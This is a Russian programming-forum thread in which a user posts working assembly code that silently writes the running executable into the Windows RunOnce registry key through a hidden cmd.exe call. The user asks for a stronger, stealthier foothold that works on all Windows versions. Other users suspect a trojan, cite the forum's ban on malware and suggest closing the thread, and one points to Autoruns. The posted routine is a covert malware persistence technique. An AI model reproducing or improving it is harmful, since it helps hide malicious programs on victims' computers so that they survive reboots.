Форум программистов, компьютерный форум, киберфорум
Наши страницы
Assembler: Windows/protected mode
Войти
Регистрация
Восстановить пароль
 
amagrupp
0 / 0 / 0
Регистрация: 01.02.2018
Сообщений: 1
1

Прописка в автозагрузке (модернизировать код)

01.02.2018, 17:44. Просмотров 199. Ответов 4
Метки нет (Все метки)

Есть код.
Assembler
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
proc    SetAutorun
 
pushad
 
jmp ..DoAutorun
 
StrCorrectFormat du '/c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /V "%s" /t REG_SZ /F /D "%s"',0,0
ValueName        du 'AAAAA',0,0
hKey             dd 1
open             du 'open',0,0
supcmd           du 'cmd.exe',0,0
 
..DoAutorun:
 
 
 
invoke  GetProcessHeap
invoke  HeapAlloc, eax, 0, 1024 *2 + 4
mov     esi, eax
mov     edi, esi
add     edi, 1024
 
invoke  GetModuleFileNameW, 0, esi, 512
 
lea     ebx, [ValueName]
invoke  wsprintfW, edi, StrCorrectFormat, ebx, esi
add     esp, 16
 
invoke  ShellExecuteW, 0, open, supcmd, edi, 0, SW_HIDE
 
 
 
.RegErr:
invoke  GetProcessHeap
invoke  HeapFree, eax, 0, esi
.AllocErr:
popad
ret
endp
Нужно сделать более хорошую автозагрузку. Одним словом хороший закреп в ОС на всех линейках.
0
Надоела реклама? Зарегистрируйтесь и она исчезнет полностью.
Similar
Эксперт
41792 / 34177 / 6122
Регистрация: 12.04.2006
Сообщений: 57,940
01.02.2018, 17:44
Ответы с готовыми решениями:

Модернизировать код
Есть код, он читает один файл, и сразу записывает его двоичной код в блокнот:...

Модернизировать код
Здравствуйте,форумчане.Задание таково:Структура елемента масиву атестаційні...

Модернизировать код использую apply
Добрый день. Помогите изменить код Код вычисляет среднее арифметическое...

Акинатор через ООП: модернизировать код
Как написать программу в С# через ООП, дерево решений создано. using System;...

Не считается результат теста: модернизировать код
Private Sub NextQ_Click() 'êíîïêà íàñòóïíå ïèòàííÿ If Option1.Value = False...

4
Kukuxumushu
Нарушитель
985 / 540 / 99
Регистрация: 13.06.2015
Сообщений: 1,790
Завершенные тесты: 2
01.02.2018, 18:05 2
Троян?
1
murderer
3319 / 1465 / 134
Регистрация: 06.10.2010
Сообщений: 3,217
03.02.2018, 11:31 3
amagrupp
Смотри список мест автозагрузки в Autoruns.

Не по теме:

Вместо HeapAlloc можно просто использовать локальную переменную в стеке. Для вызова wsprintfW есть cinvoke.

1
Uncle Remus
Заблокирован
03.02.2018, 11:36 4
Kukuxumushu,
не, тс хочет выбрать среднее зло для закрепа, ему интересны лишь мысли людей, что бы на рентайме спокойнее было.
0
murderer
3319 / 1465 / 134
Регистрация: 06.10.2010
Сообщений: 3,217
12.02.2018, 09:04 5
По хорошему закрыть бы тему.
Запрещено создание и распространение вредоносного ПО, вирусов, кряков и взлома лицензионного софта, а также публикация ссылок для их скачивания.
Он всё равно уже нашёл дорогу на васм.
1
12.02.2018, 09:04
MoreAnswers
Эксперт
37091 / 29110 / 5898
Регистрация: 17.06.2006
Сообщений: 43,301
12.02.2018, 09:04

Модернизировать данный код под вызов в интервале 1 мс
ребят помогите пожалуйста можно как нибудь улучшить данный код, стоит под...

Модернизировать код программы, чтобы программа выводила только те строки, где существуют двузначные числа
Есть файл, в нем содержится: Mikro mikro2 Mikro33 Mikro34 Mikro35 ...

Прописка в папку автозагрузки
Подскажите как прописать прогу в папку автозагрузки , и как сделать так чтобы...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
5
Ответ Создать тему
Опции темы

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2018, vBulletin Solutions, Inc.
Рейтинг@Mail.ru